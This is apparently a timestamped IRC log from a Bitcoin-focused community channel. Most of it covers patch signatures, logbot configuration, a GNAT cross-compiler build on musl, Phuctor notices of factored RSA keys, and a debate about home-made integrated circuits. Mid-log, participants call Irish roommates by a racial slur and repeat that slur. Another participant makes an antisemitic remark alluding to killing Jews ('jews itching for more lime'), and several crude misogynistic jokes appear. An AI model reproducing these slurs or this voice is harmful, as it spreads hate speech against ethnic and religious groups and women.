one stuck. 1806394;1525053389;jhvh1;mod6: The operation succeeded. 1806395;1525053435;mod6;http://btcbase.org/log/2018-04-29#1806228 << >> http://www.mod6.net/2018/April/30/phexdigit_post.txt >> http://www.mod6.net/2018/April/30/mod6_phexdigit_fix.vpatch >> http://www.mod6.net/2018/April/30/mod6_phexdigit_fix.vpatch.mod6.sig 1806396;1525053435;a111;Logged on 2018-04-29 01:55 mod6: pfff http://btcbase.org/patches/genesis#L23074 1806397;1525055463;mircea_popescu;pinochle, ok, do you ever read the logs ? 1806398;1525055535;pinochle;yes 1806399;1525055565;mircea_popescu;so did you read the http://btcbase.org/log/2018-04-29#1806306 portion ? 1806400;1525055565;a111;Logged on 2018-04-29 14:58 mircea_popescu: yes, it was. to summarize, careful what you do with your patches, in the following sense : if diana_coman doesn't CONTINUE your patch, it will have to be reground later. as she's a human being with other problems and interests than folding in your alt universe, it helps IMMENSELY if you make your patches small and readable. 1806401;1525055685;pinochle;yes I did 1806402;1525055762;mircea_popescu;how did you figure it applies to you ? 1806403;1525055842;pinochle;begin with a small, reliable contribution, don't reinvent wheels 1806404;1525055872;pinochle;don't be a man alone 1806405;1525055889;mircea_popescu;alright ; and you figure "hey, i implemented a poker bot" is this ? 1806406;1525056288;pinochle;I see ; a motivating factor for going off and building was, selfishly, to learn 1806407;1525056458;mircea_popescu;nothing wrong with that, really. 1806408;1525056516;mircea_popescu;but the key to survival is working with others ; and the key to the others being others rather than just shitty clones of yourself is for them to be independently intelligent ; and then in turn the key to working with independently intelligent folk is... making it possible for them to work with you! 1806409;1525056539;mircea_popescu;"here's a black box", howsoever implemented in practice, "really lengthy patch you don't have the time to read" or "my poker bot" or whatever, is not-this. 1806410;1525056562;mircea_popescu;which is also why anonimity is the pantsuit-mandated mode of behaviour for intelligent zeks online. 1806411;1525056582;mircea_popescu;person-as-a-black-box needs inca's services for human interaction, hence "stop campus rape" etc. 1806412;1525056814;pinochle;there is not a word I disagree with ; so I have errored in that way, but the path forward is clear 1806413;1525056962;pinochle;deconstruct, refine and communicate on republican terms and in consumable bites ; that is what I shall do 1806414;1525057291;mircea_popescu;you ever read say http://trilema.com/2015/whoever-said-resource-allocation-is-a-solved-problem-deserves-a-kick-in-the-nads/ ? 1806415;1525057328;mircea_popescu;there's a humongous swath of republican land just waiting for a plow shaped exactly like a trader's who studied probability in school and spends his days building predictive models. 1806416;1525057933;pinochle;have not read, but will now ; that is encouraging, so lets get to work 1806417;1525058738;lobbes;anyone out there with a running instance of logbot-multiple-channels-corrected (ben_vulpes, danielpbarron)? I've run into the same issue alf was having >> http://btcbase.org/log/2017-12-24#1758074 1806418;1525058738;a111;Logged on 2017-12-24 18:26 asciilifeform: you changed 'channel' slot in ircbot class to 'channels', but never bothered to change the corresponding line in make-ircbot !! ben_vulpes ) 1806419;1525058742;lobbes;my logbot-genesis instance worx fine, but I will need to have this thing sitting in at least two channels 1806420;1525058765;ben_vulpes;lobbes: yeah i have one running 1806421;1525058773;ben_vulpes;2 actually 1806422;1525058872;ben_vulpes;lobbes: iirc make-logbot still works but it is make-ircbot that does not 1806423;1525059029;lobbes;okay, so I should be able to run the logbot-with-multiple-channels-corrected portion as long as I run the ircbot portion as the original? 1806424;1525059161;ben_vulpes;why use ircbot instead of the logbot? 1806425;1525059197;ben_vulpes;logbot provides a very handy set of slots for plugging responders into 1806426;1525059271;lobbes;ah, okay, perhaps I'm doing this wrong. I assumed that I needed both the ircbot and logbot to be running and connected to irc concurrently 1806427;1525059280;ben_vulpes;newp, just the latter 1806428;1525059284;lobbes;nice, okay 1806429;1525059290;lobbes;thanks! 1806430;1525059295;ben_vulpes;sure thing 1806431;1525059315;ben_vulpes;logbot does everything that ircbot does and in addition writes everything it sees to the log table 1806432;1525059373;mircea_popescu;you know you've run this thing in a pretty confusing manner! there's like... 3 roots people don't know which to pick ? 1806433;1525059429;ben_vulpes;your listening process just needs to 'listen log_new_message' and then use whatever the wait-for-message abstraction is in the programming language for your responding service to wait for the primary key to come in, read that line out of the table and then either insert a response into outbox with the appropriate target or not as it chooses 1806434;1525059650;ben_vulpes;mircea_popescu: if lobbes wants to run ircbot separately, without the logbot functionality, he could if he liked, and without taking a dependency on the logbot stuffs. 'tis why they're separate trees. 1806435;1525059690;mircea_popescu;ah so there's actually just two and yeah i see, nm. 1806436;1525059735;trinque;lets people decide not to use the part that's grafted to postgres 1806437;1525059735;lobbesbot;trinque: Sent 5 hours and 35 minutes ago: deedbot seems to have skipped a number of phuctor rss ticks today 1806438;1525059762;trinque;^ if it's skipping forward faster than 6 at a time, it's not going to barf them all up. 1806439;1525059774;trinque;or whatever the magic number is. but there is one. 1806440;1525059914;lobbes;later-tell reminded me to pose this q to the court: Should later-tells go to pm or stay in-channel? 1806441;1525059994;trinque;doesn't seem to me like they're doing any harm as they work currently. 1806442;1525060103;lobbes;word. well, if folx start to think it is getting too spammy, let me know 1806443;1525060506;mircea_popescu;eh, so it's one line in response to human agency, how bad can it be. 1806444;1525066788;ben_vulpes;mircea_popescu: http://btcbase.org/log/2018-04-24#1805215 1806445;1525066788;a111;Logged on 2018-04-24 18:35 deedbot: Invoiced mircea_popescu .0336 << shared hosting for s.mg april 24 2018 through april 30 2019 1806446;1525066812;mircea_popescu;ben_vulpes, can has for whole year plox ? 1806447;1525066958;ben_vulpes;that invoice takes you through the end of april 2019 1806448;1525067046;ben_vulpes;it has six extra days for ease of calendrical bookkeeping, let me know if this does not suit or i misunderstand in some way. 1806449;1525068135;ben_vulpes;http://sam.zeloof.xyz/first-ic/# << 'garage' ic 1806450;1525068858;mircea_popescu;ah ah ty. 1806451;1525068936;mircea_popescu;!!invoices 1806452;1525068974;ben_vulpes;received- and sent- 1806453;1525068990;mircea_popescu;!!received-invoices 1806454;1525068994;deedbot;http://p.bvulpes.com/pastes/bNouL/?raw=true 1806455;1525069005;mircea_popescu;was just checking out the help lol. 1806456;1525069023;ben_vulpes;http-over-benjamins 1806457;1525070177;ben_vulpes;and in Star Topology Today https://arstechnica.com/tech-policy/2018/04/france-seizes-france-com-from-man-whos-had-it-since-94-so-he-sues/ 1806458;1525070243;mircea_popescu;anyone recall the sex.com lulz ? 1806459;1525070261;mircea_popescu;in the end the "very valuable" "premium" domain found 0 economic utility. 1806460;1525070326;ben_vulpes;poor babie3s 1806461;1525071561;mircea_popescu;http://logs.minigame.biz/2018-04-30.log.html#t06:58:50 :D 1806462;1525071588;mircea_popescu;lobbes, does it no longer read ? biz ? 1806463;1525071953;lobbes;that's..odd. that link works in my test chan >> http://logs.minigame.biz/2018-04-30.log.html#t06:58:50 1806464;1525071953;lobbesbot;Logged on 2018-04-30 06:58:50: well, if pinochle fellow gets around to modeling it properly, we might even find out what they're worth! 1806465;1525071957;lobbes;weird.. 1806466;1525071996;mircea_popescu;that's..odd. that link works in my test chan >> http://logs.minigame.biz/2018-04-30.log.html#t06:58:50 : 1806467;1525071997;lobbesbot;Logged on 2018-04-30 06:58:50: well, if pinochle fellow gets around to modeling it properly, we might even find out what they're worth! 1806468;1525072004;mircea_popescu;http://logs.minigame.biz/2018-04-30.log.html#t06:58:50 : 1806469;1525072004;lobbesbot;Logged on 2018-04-30 06:58:50: well, if pinochle fellow gets around to modeling it properly, we might even find out what they're worth! 1806470;1525072006;mircea_popescu;http://logs.minigame.biz/2018-04-30.log.html#t06:58:50 :D 1806471;1525072006;lobbesbot;Logged on 2018-04-30 06:58:50: well, if pinochle fellow gets around to modeling it properly, we might even find out what they're worth! 1806472;1525072013;mircea_popescu;o.O 1806473;1525072099;lobbes;damn cosmic rays 1806474;1525079850;mircea_popescu;meanwhile in canine optionality, https://78.media.tumblr.com/bcceef2dd0612935295d943140eec9e6/tumblr_mxls22UAN91sg5ujao1_1280.jpg 1806475;1525087480;deedbot;http://ave1.org/2018/building-gnat-on-musl-now-with-arm-64-bit-support/ << ave1 - Building GNAT on MUSL, now with ARM 64-bit support 1806476;1525088321;deedbot;http://phuctor.nosuchlabs.com/gpgkey/6D0F4D10B2071CB5D0BE46C03E04D6543662B6EE4BD153225B345E05B6CFA1D6 << Recent Phuctorings. - Phuctored: 9371...7789 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (fixed-189-203-181-9.totalplay.net. MX DIF) 1806477;1525088321;deedbot;http://phuctor.nosuchlabs.com/gpgkey/A7763314024A636A7A49B1EBDE60BB1C47E2A8DE95A02C3FFCF374D32BEADCBA << Recent Phuctorings. - Phuctored: 9371...7789 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (fixed-189-203-181-151.totalplay.net. MX DIF) 1806478;1525088321;deedbot;http://phuctor.nosuchlabs.com/gpgkey/643A139EF044F87F326F313092BDE22D60C79A81318BABB87AE5C142BC86B939 << Recent Phuctorings. - Phuctored: 9371...7789 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (fixed-189-203-181-7.totalplay.net. MX DIF) 1806479;1525088321;deedbot;http://phuctor.nosuchlabs.com/gpgkey/839ABB69349BD78F784309DB89D871C3CA284C1EF0E060E1FF3A19BEB3882351 << Recent Phuctorings. - Phuctored: 9371...7789 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (fixed-187-188-126-28.totalplay.net. MX DIF) 1806480;1525088322;deedbot;http://phuctor.nosuchlabs.com/gpgkey/F97816E68FFBD245AD39F3509A34B16D8F193D91A6125903354AB4CB383548F3 << Recent Phuctorings. - Phuctored: 9371...7789 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (fixed-189-203-181-149.totalplay.net. MX DIF) 1806481;1525088322;deedbot;http://phuctor.nosuchlabs.com/gpgkey/9D60710F34429805CA983E018B19C9D0400E3978C6A4F97721303D362A1E9941 << Recent Phuctorings. - Phuctored: 9371...7789 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (fixed-189-203-72-147.totalplay.net. MX DIF) 1806482;1525091537;deedbot;http://phuctor.nosuchlabs.com/gpgkey/CB0D4276A5FC8D25B4B36A6949A1739C23C82C7E8B46D6C93257C1F35F23A8DF << Recent Phuctorings. - Phuctored: 1372...2929 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown FR) 1806483;1525093094;jurov;mod6: the clearsigned text has bad signature 1806484;1525093331;jurov;mod6: when you have such complicated text, it's best to keep it clearsigned in a file. 1806485;1525093392;jurov;And attach it as first attachment. Then in case of problems check it against contents in your "sent mail" to rule out mutilation by your email client. 1806486;1525093502;jurov;I have got this: http://p.bvulpes.com/pastes/2Bfjx/?raw=true 1806487;1525093520;jurov;Really curious which misfeature caused the breakage this time. 1806488;1525098828;mod6;jurov: Ah, alright, thanks for checking. It's weird because I did check the clearsigned file before sending, verified fine. Mail Client / ML must have magled it. 1806489;1525098869;mod6;http://btcbase.org/log/2018-04-30#1806395 << If anyone wants to read / check sigs, these have not been through the mangler. Should be ok. 1806490;1525098869;a111;Logged on 2018-04-30 01:57 mod6: http://btcbase.org/log/2018-04-29#1806228 << >> http://www.mod6.net/2018/April/30/phexdigit_post.txt >> http://www.mod6.net/2018/April/30/mod6_phexdigit_fix.vpatch >> http://www.mod6.net/2018/April/30/mod6_phexdigit_fix.vpatch.mod6.sig 1806491;1525100985;BingoBoingo;Fuck this humidity 1806492;1525101019;mod6;Mornin BingoBoingo 1806493;1525101022;BingoBoingo;NOTHING is drying out 1806494;1525101030;mod6;yeesh 1806495;1525101033;BingoBoingo;mornin mod6 1806496;1525101126;BingoBoingo;And the FUCKING POTATO NIGGERS INSIST on closing the windows and blinds to the room as they remain passed out until 16:00 hrs. 1806497;1525101465;BingoBoingo;By the time the fuckers leave there is a disturbingly high chance everything that isn't already mildewed will be. 1806498;1525101673;BingoBoingo;Fucking 20-25 year old college students and graduates that never learned how to dorm without being completely disgusting 1806499;1525101969;BingoBoingo;And so because these fuckers are afraid of mosquitos coming in an even slightly open window while likely reintroducing chinches de cama, everything must mildew. Thus is the determination of the Irish hivemind 1806500;1525102156;BingoBoingo;And in other turds >> https://undeadly.org/cgi?action=article;sid=20180429101731 "-fretpoline for non-RAMDISK kernels. Skylake product needs it, and therefore all other x86 cpus must pay the performance price of the hazard workaround until Skylake disappears from the ecosystem eventually like 486. This returns your cpu's performance to pre-inflated performance." 1806501;1525103502;phf;http://btcbase.org/log/2018-04-30#1806496 << first world "men" don't understand the concept of hygiene, i suspect that as the infrastructure starts failing this would be the number one reason of rapid decay. hygiene not just in a sense of "washing hands", but the idea that there's certain procedures that you have to follow in order to not get fucked over by the environment 1806502;1525103502;a111;Logged on 2018-04-30 15:12 BingoBoingo: And the FUCKING POTATO NIGGERS INSIST on closing the windows and blinds to the room as they remain passed out until 16:00 hrs. 1806503;1525103595;phf;but at the same time i suspect that the hostel in question doesn't for example have mosquito nets on bed frames, so it's possible that nigger runs deep in this particular case. 1806504;1525103820;asciilifeform;!!up BigTexasBingo 1806505;1525103821;deedbot;BigTexasBingo voiced for 30 minutes. 1806506;1525103829;asciilifeform;phf: i saw 0 mosquito nets anywhere in BingoBoingostan 1806507;1525103837;asciilifeform;but, to be fair, 0 mosquitos 1806508;1525103849;asciilifeform;( how this is possible -- i've currently nfi ) 1806509;1525103872;BigTexasBingo;We don't have threatening mosquitoes here. There is a bit of Dengue in the North of Uruaguay, but in the city it isn't a thing 1806510;1525103911;*;asciilifeform guesses 'half century of ddt' 1806511;1525103913;BigTexasBingo;The Irish religious applications of insect repellent lead me to believe they are reinfesting the place with cinches 1806512;1525104031;asciilifeform;!Q later tell ave1 http://btcbase.org/log/2018-04-30#1806475 >> http://ave1.org/2018/building-gnat-on-musl-now-with-arm-64-bit-support/#comment-46 1806513;1525104031;a111;Logged on 2018-04-30 11:24 deedbot: http://ave1.org/2018/building-gnat-on-musl-now-with-arm-64-bit-support/ << ave1 - Building GNAT on MUSL, now with ARM 64-bit support 1806514;1525104032;lobbesbot;asciilifeform: The operation succeeded. 1806515;1525104386;asciilifeform;http://btcbase.org/log/2018-04-30#1806449 << this appears to be honest work, but if you look at what he actually did, and with what resources, the 'imponade' evaporates away -- he made a coupla-transistor ic , and with 'garage' filled with a princely collection of surplus industrial gear ( electron microscope, sputtering chamber, ~very~ high end optical microscopes, incl. the one he junkyard-wars'd into a lithography box ) , 1806516;1525104386;a111;Logged on 2018-04-30 06:02 ben_vulpes: http://sam.zeloof.xyz/first-ic/# << 'garage' ic 1806517;1525104441;asciilifeform;i.e. not the typical meaning of 'garage', and not replicable by anybody without either couple-deca-$mil or 25 yrs of access to just-so junkyards 1806518;1525104506;asciilifeform;i also gotta point out that to make larger ic is quite more than linearly moar painful ( 1 defect --> rubbish; larger die , with 'orc' process, means that P of fatal defect approaches 1 ) 1806519;1525104608;asciilifeform;point being, d00d made 0 fundamental breakthrough that would enable 'cheap ic fab' or anything even with stretch of imagination describable as such a thing. 1806520;1525104735;asciilifeform;picture, with access to e.g. boeing's , junkyard, a similar d00d could build something like the nazi 1-seat jet, with own hands also. but to describe it as 'garage-buildable jet' is rather chumpatronic spin imho. 1806521;1525104960;asciilifeform;( for the sake of thread-completeness, what would the ~alternative~ to this story look like? i suggest -- it'd be a process which does to ic fab what 'polaroid' process did to colour photography. find way of etching the circuit from prefab 'sandwich' without caustic baths, sputtering, etc... ) 1806522;1525105139;ave1;asciilifeform, Thanks! I seem to have made a copy and paste error. Links should be updated now... 1806523;1525105139;lobbesbot;ave1: Sent 18 minutes ago: http://btcbase.org/log/2018-04-30#1806475 >> http://ave1.org/2018/building-gnat-on-musl-now-with-arm-64-bit-support/#comment-46 1806524;1525105148;asciilifeform;ty ave1 , will look 1806525;1525105271;asciilifeform;ave1: plox elaborate re the 'after some more work' item ? 1806526;1525105301;asciilifeform;ave1: i.e. is the tarball 'ready for primetime' ? ... or requires toothpicks, glue, and a month of ??? 1806527;1525105474;asciilifeform;ben_vulpes: re ic fabs, see also ancient thread http://btcbase.org/log/2015-02-18#1023009 . 1806528;1525105474;a111;Logged on 2015-02-18 04:31 asciilifeform: the only thing that seems certain imho is that starting from existing concept of ic fab is a dead end 1806529;1525105757;ave1;asciilifeform, that work has been done, it builds a native compiler with gcc/g++ and gnatmake but not with gprbuild yet (this last one can be build on the target machine). I can build the FFA code on an aarch64 machine with the resulting compiler. 1806530;1525105779;asciilifeform;ave1: how exactly do you build it without gprbuild ? 1806531;1525105784;asciilifeform;with handwritten makefile ?? 1806532;1525105836;asciilifeform;i'll point out, this is not equivalent to 'build ffa', the gpr file is part of ffa, and contains essential functionality ( mainly , incorporates the restriction flags, mandates staticity ) 1806533;1525105839;ave1;you'll need gnat2016 from AdaCore on an intel 64bit machine, and that should be all (except for a shell tar, curl etc) 1806534;1525105870;ave1;I build it with gnatmake -Pffa_demo.gpr (I did this up to chapter 3 so far) 1806535;1525105897;asciilifeform;right, but ave1 did you actually get the complete equivalent-to-binary-kit-from-adacore-complete-with-gprbuild-etc made ? 1806536;1525105975;ave1;for the cross-compiler "yes" for the native one "no" 1806537;1525106000;asciilifeform;what happens if you build 'cross' but with 'x86-64' as the target ? 1806538;1525106049;ben_vulpes;asciilifeform: i'll put teh scare quotes in a clown mask next time 1806539;1525106051;ave1;It's an artifact of the original script, you get a 'cross' compiler that creates code for the same machin 1806540;1525106136;ave1;BTW although it does build code based on shared libraries, this code needs the musl "ld.so" to live at a specific place, so that does not work. 1806541;1525106143;asciilifeform;ben_vulpes: my observation was moar re the 'field' than even the particular item. 1806542;1525106164;ave1;So static code works out of the box, but dynamic not so 1806543;1525106173;asciilifeform;ave1: where, incidentally, does one get this ld.so ? 1806544;1525106426;ave1;it's part of the cross compiler (under aarch64-linux-musl/aarch64-linux-musl/lib directory). The compilers assume it will live under /lib/ld.so, so that part won't work on glibc machines 1806545;1525106496;asciilifeform;so lemme get this straight : this entire thing requires a pre-existing 100%-musltronic linux, to work at all ?? 1806546;1525106519;ave1;yes, but on a different architecture, i.e. you can build aarch64 on x86_64 1806547;1525106540;asciilifeform;because this means that asciilifeform cannot currently even begin to test ave1's thing -- asciilifeform does not have a musltronic-linux machine 1806548;1525106543;ave1;o sorry, no not musltronic, the adacore one will work fine 1806549;1525106546;asciilifeform;( afaik only trinque has one ) 1806550;1525106569;asciilifeform;um so which is it ? 1806551;1525106574;asciilifeform;what 'won't work on glibc machines' 1806552;1525106584;asciilifeform;because atm all i've got is glibcmachines 1806553;1525106597;ave1;I made a mistake on the earlier assertion, it works on glibc machines 1806554;1525106602;asciilifeform;hm ok 1806555;1525106617;ave1;the scripts build statically compiles gcc/gnatmake compilers 1806556;1525106624;ave1;so those will work everywhere 1806557;1525106704;ave1;The whole static/dynamic statement was about the code generated by the compilers 1806558;1525106720;ave1;Sorry, for the confusion 1806559;1525106720;asciilifeform;ave1: what's CC_BASE_PREFIX ? 1806560;1525106807;ave1;Aha, I should have cleared that one, it will be overridden by the build-ada.sh script 1806561;1525106831;ave1;I.E. it's the directory under which all the compilers will be installed 1806562;1525106858;asciilifeform;ave1: so where ought i to set this dir ? 1806563;1525106887;ave1;You can clear it or keep it, You'll need to run ./ada-build.sh 1806564;1525106895;ave1;that DIR can be whatever you want 1806565;1525106908;ave1;the final compilers are not depended on that part 1806566;1525106919;ave1;i.e. you can copy them to other dirs if wanted 1806567;1525106933;ave1;(sorry build-ada.sh) 1806568;1525107059;asciilifeform;ave1: http://p.bvulpes.com/pastes/ug8pw/?raw=true 1806569;1525107105;ave1;A sorry, I stand corrected, it needs to be an absolute directory name 1806570;1525107106;asciilifeform;ave1: ( have you tested this on a box that has never seen musl ? ^this is what i got. ) 1806571;1525107129;ave1;Yes I have developed and run this on a computer without musl 1806572;1525107143;ave1;(a modern redhat system also, just for fun) 1806573;1525107144;*;asciilifeform retries... 1806574;1525107200;ave1;The only system I was unsuccessful so far was a machine without static libraries 1806575;1525107286;ave1;btw successful build of the whole thing takes about 3 hours on my machine 1806576;1525107384;asciilifeform;btw ave1 the only WITH_ARCH i see in your text is 'armv7'. so how does it work on aarch64 ? 1806577;1525107390;asciilifeform;what am i missing 1806578;1525107417;ave1;look at build-ada.sh (I did not update the documents etc) 1806579;1525107511;asciilifeform;ave1: http://p.bvulpes.com/pastes/cSP4C/?raw=true << is what i see. doesn't answer the riddle 1806580;1525107537;asciilifeform;show me where it turns into --with-arch=aarch64 1806581;1525107566;ave1;done by build-tarballs.sh 1806582;1525107575;asciilifeform;( and yes i ran it, and possibly in 3hrs i'll see what came out of it, but currently i suspect that it's gonna build 32bit elfs ) 1806583;1525107882;asciilifeform;ave1: out of curiosity, didja look at the output ? what bitness is it ? 1806584;1525107896;asciilifeform;( of the compiler that you produced, that is, when it builds e.g. ffa ) 1806585;1525108117;*;asciilifeform also curious re why the port required 300kB of patch, incl to .adb/.ads of gnat, but possibly this will be answered later 1806586;1525108749;deedbot;http://qntra.net/2018/04/australian-government-pursues-critics-as-racketeering-organization/ << Qntra - Australian Government Pursues Critics As "Racketeering Organization" 1806587;1525109123;phf;“Happy Birthday, Karl Marx. You Were Right (nytimes.com)” 1806588;1525109385;mircea_popescu;jews itching for more lime. 1806589;1525109701;mircea_popescu;meanwhile in urban exploration, https://78.media.tumblr.com/f71ae9ad47441b6d9b2ae0f62a32a567/tumblr_nraxucVa9S1ribksno7_1280.jpg 1806590;1525110516;mircea_popescu;http://btcbase.org/log/2018-04-30#1806493 << now you know what a vagina feels like! 1806591;1525110516;a111;Logged on 2018-04-30 15:10 BingoBoingo: NOTHING is drying out 1806592;1525110771;mircea_popescu;asciilifeform, check this shit out : http://mulyadi.staff.uns.ac.id/2013/06/19/proses-desain-menurut-archer/ 1806593;1525110790;mircea_popescu;pinoy actually uses shanonizing as THE, not an, but THE intellectual mode of life. 1806594;1525110810;asciilifeform;sadly my indonesian-fu is weak 1806595;1525110817;mircea_popescu;pengumpulan data and analisis mengidentifikasi submasalah. 1806596;1525110879;mircea_popescu;asciilifeform, i expect submasalah is the hottentottenmutter stottertrottel version of sub[missive]-massah-allah. 1806597;1525110934;asciilifeform;reminds me, of how asciilifeform once time thought that the common surname 'subrahmanian' refers to something like a lieutenant-brahmin 1806598;1525110975;mircea_popescu;lol\ 1806599;1525110983;mircea_popescu;ahahaha. 1806600;1525110998;asciilifeform;i.e. like подполковник ( lt colonel ) to полковник (colonel) 1806601;1525111026;mircea_popescu;well, i always thought polkovnik is a guy who brings graft money. 1806602;1525111027;asciilifeform;sub- <-> под- . 1806603;1525111029;mircea_popescu;plocon, in ro. 1806604;1525111040;mircea_popescu;(gift to the sublime porte) 1806605;1525111056;asciilifeform;lol, полк is a ploc ?! 1806606;1525111075;mircea_popescu;dilsexya. 1806607;1525111122;mircea_popescu;meanwhile in the well of knowledge, pushing the infinite boundaries of darkness towards their core that spawned them, i give you... WOMAN! https://78.media.tumblr.com/dfa482d3716c7dd79d85a2ccf8dcff60/tumblr_nraxucVa9S1ribksno9_1280.jpg 1806608;1525111139;mircea_popescu;sadly the discoveries are unactionable and incommunicable. 1806609;1525111155;asciilifeform;iirc mircea_popescu has a pretty good oubliette design on trilema a while bacj 1806610;1525111156;asciilifeform;k 1806611;1525111421;mircea_popescu;http://btcbase.org/log/2018-04-30#1806501 << this is very muych so ; even entriely banal procedures that built and butressed cont9inued human occupation of their sad patches of soil, like say putting up preserves for the winter, are far outside their mental scope. unlike whatever irrelevant pantsuit fashions, which never did jack measurable anything, but which are all they fucking talk about. 1806612;1525111421;a111;Logged on 2018-04-30 15:51 phf: http://btcbase.org/log/2018-04-30#1806496 << first world "men" don't understand the concept of hygiene, i suspect that as the infrastructure starts failing this would be the number one reason of rapid decay. hygiene not just in a sense of "washing hands", but the idea that there's certain procedures that you have to follow in order to not get fucked over by the environment 1806613;1525111463;mircea_popescu;i can't begin to describe how infinitely more mindnumbingly boring some moron derping on about priviledge, women's rights, blacks whatevers is when compared to any old bitty that wants to talk of nothing but cheap meals and best way to make prune jam. 1806614;1525111521;mircea_popescu;the latter is entirely the reason ireland didn't go the way of http://btcbase.org/log/2017-10-16#1725493 1806615;1525111521;a111;Logged on 2017-10-16 15:59 mircea_popescu adds this to his private "annals of orc history", in there with the scottish empire at darien and stuffs. 1806616;1525111605;mircea_popescu;http://btcbase.org/log/2018-04-30#1806515 << recall the black genius kid who made a clock out of "household materials" such as... a clock ? 1806617;1525111605;a111;Logged on 2018-04-30 16:06 asciilifeform: http://btcbase.org/log/2018-04-30#1806449 << this appears to be honest work, but if you look at what he actually did, and with what resources, the 'imponade' evaporates away -- he made a coupla-transistor ic , and with 'garage' filled with a princely collection of surplus industrial gear ( electron microscope, sputtering chamber, ~very~ high end optical microscopes, incl. the one he junkyard-wars'd into a lithography box ) , 1806618;1525111644;asciilifeform;mircea_popescu: aaaha. sorta like a high-tech version of it. or moar general phenomenon of 'easy to make $mil: begin with $bil..' 1806619;1525111704;asciilifeform;on one hand, d00d ~did~ demonstrate grasp of the physical principles behind ic. on other hand -- to offer the result up in the dressing it is offered in -- is, to put it softly, misleading. 1806620;1525111718;mircea_popescu;iirc one of the usg's own oligarchs (ie, inept dorks given money by a govt to pretend they're businessmen and can compete with us, exactly in the vein of http://trilema.com/2014/the-death-of-taxes/#selection-185.266-185.1138 ) even SAID THOSE WORDS. 1806621;1525111739;mircea_popescu;and it's true, of course. for the moartea-ca-o-veste-buna folk, that's exactly how everything goes, "how to make shit ? start with bread." 1806622;1525111789;BingoBoingo; http://btcbase.org/log/2018-04-30#1806493 << now you know what a vagina feels like! << What about menopause? 1806623;1525111789;a111;Logged on 2018-04-30 15:10 BingoBoingo: NOTHING is drying out 1806624;1525111793;asciilifeform;recall the legend ( i have nfi from what country it originated..) re the clever scammer who sold counterfeiters 'dollar printing machine', which worked great until hidden box ran out of dollarz 1806625;1525111800;mircea_popescu;http://btcbase.org/log/2018-04-30#1806521 << i'll tell you what it would look like. every seen one of those large acid sheets back at the acid sheet factory ? before being broken into tiny bits for the street vendors ? THAT. except of course in reverse, let me print bits and smash them together into large fabrics. EVEN IF they're not nm. 1806626;1525111800;a111;Logged on 2018-04-30 16:16 asciilifeform: ( for the sake of thread-completeness, what would the ~alternative~ to this story look like? i suggest -- it'd be a process which does to ic fab what 'polaroid' process did to colour photography. find way of etching the circuit from prefab 'sandwich' without caustic baths, sputtering, etc... ) 1806627;1525111819;mircea_popescu;BingoBoingo, arguably menopausal vagina not anymore vagina than engine on foil is car. 1806628;1525111943;asciilifeform;mircea_popescu: i strongly suspect that 'polaroid' is the correct path. ( i.e. photographic input of where-what-goes; all of the chemistry needed -- sealed in a capsule, pops and exposes ) 1806629;1525111961;asciilifeform;rather than, e.g., physically moving microscopic parts ( generally a nonstarter ) 1806630;1525111972;mircea_popescu;and you'd make this sea-in-skin womb in your garage ? 1806631;1525111992;mircea_popescu;i don't dispute this is where it's headed, human reproduction system took the "we shall emulate original sea" step of eggs one notch further, yes. 1806632;1525111993;asciilifeform;~expose~ in garage. where made -- less important. because specificity-of-diddling . 1806633;1525112008;asciilifeform;( maker of the film has nfi what will be exposed on it, where . ) 1806634;1525112009;mircea_popescu;but you're just doing what he did in a more... encapsulated way. 1806635;1525112032;asciilifeform;nope. and i'd think the diff is pretty clear 1806636;1525112035;mircea_popescu;where -- less important, if, of course, you have a placenta factory. 1806637;1525112071;mircea_popescu;it's something like bullet. "hard to make gunpowder, need saltpeter" "i know, we'll make these little cartridges, with the needed saltpeter included" "yes but now you need a bullet factory" 1806638;1525112073;BingoBoingo;And it turns out the locals get YET ANOTHER fucking holiday tomorrow. This one is because they claim they LABOR! 1806639;1525112080;asciilifeform;b&w photography is imho correctly seen as 'garage affair', notwithstanding that not 1 in 100,000 photohobbyists could produce the film 1806640;1525112095;mircea_popescu;BingoBoingo, may 1st dood. 1806641;1525112124;BingoBoingo;And? 1806642;1525112135;mircea_popescu;asciilifeform, let's call it a ~design~ notation process, rather than fabbing ? 1806643;1525112160;asciilifeform;the diff is in re how commoditizable/fungible the raw material. it is not trivial to make paper that'll feed a laser printer and not catch fire / clog the rollers, but no one suffers any shortage of said paper today, it is produced on massive scale and sold for half penny / sheet 1806644;1525112175;BingoBoingo;New year is January 1st. Is there a second parallel Jew year that starts in May? 1806645;1525112179;asciilifeform;because universal/fungible. 1806646;1525112226;mircea_popescu;i'm not proposing the encapsulation doesn't havfe advantages. it does, which is why yes, laser paper universal as well as palcental mammals universal. 1806647;1525112242;asciilifeform;raw pcb feedstock, while not same as paper, is also pretty cheap. and if ic were produced via process as simple as pcb is produced, ic fabric would also cost similarly. 1806648;1525112242;mircea_popescu;and yes, it's prolly where it's going. 1806649;1525112269;mircea_popescu;asciilifeform, which brings us back to what i said, "even if not nm" 1806650;1525112282;*;asciilifeform at one time made own pcb routinely, 2sided even, and all of the req'd kit fit in a suitcase and most of it obtainable at photography shops 1806651;1525112290;mircea_popescu;my problem with the ZX processors IS EMINENTLY NOT that "they're too big". is that i can't buy 500k of them and lego them up. 1806652;1525112301;asciilifeform;mircea_popescu: gotta have at least 1uM process, to be of practical use, by my reckoning 1806653;1525112328;mircea_popescu;intel "solving" thge wholly hallucinated (if self-servingly) non-"problem" of "smaller process" is not helping 